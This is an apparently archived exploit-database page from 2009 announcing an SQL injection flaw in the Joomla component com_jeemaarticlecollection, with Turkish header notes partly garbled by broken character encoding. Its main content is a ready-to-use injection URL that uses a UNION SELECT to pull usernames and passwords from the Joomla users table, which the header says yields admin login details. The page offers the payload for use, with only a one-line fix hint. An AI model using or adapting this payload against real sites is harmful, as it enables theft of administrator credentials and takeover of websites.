[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_jeemaarticlecollection SQL injection
# Published : 2009-12-24
# Author : Fl0riX
# Previous Title : Joomla Component com_carman Cross Site Scripting Vulnerability
# Next Title : Jax Guestbook 3.50 Admin Login Exploit


<------------------- header data start ------------------- >

#############################################################
       Joomla Component com_jeemaarticlecollection SQL injection Vulnerability                                          
#############################################################

#author        : Fl0riX

# Greetz          : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r

# Name        : com_jeemaarticlecollection

# Bug Type       : SQL Injection

# Infection      : Admin login bilgileri al&#65533;nabilir.

# Bug Fix Advice : Zararl&#65533; karakterler filtrelenmelidir. Kimsesizli&#65533;im O Dereceye Vard&#65533; Ki &#65533;evremde Bela Girdab&#65533;ndan Ba&#65533;ka D&#65533;nen Kimse Yok.(!)

# Note : Kimsesizli&#65533;im O Dereceye Vard&#65533; Ki &#65533;evremde Bela Girdab&#65533;ndan Ba&#65533;ka D&#65533;nen Kimse Yok.(!)

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?view=longview&catid=null/**/union/**/select/**/concat(username,0x3a,password),2/**/from/**/jos_users&Itemid=107&option=com_jeemaarticlecollection

< -- bug code end of -- >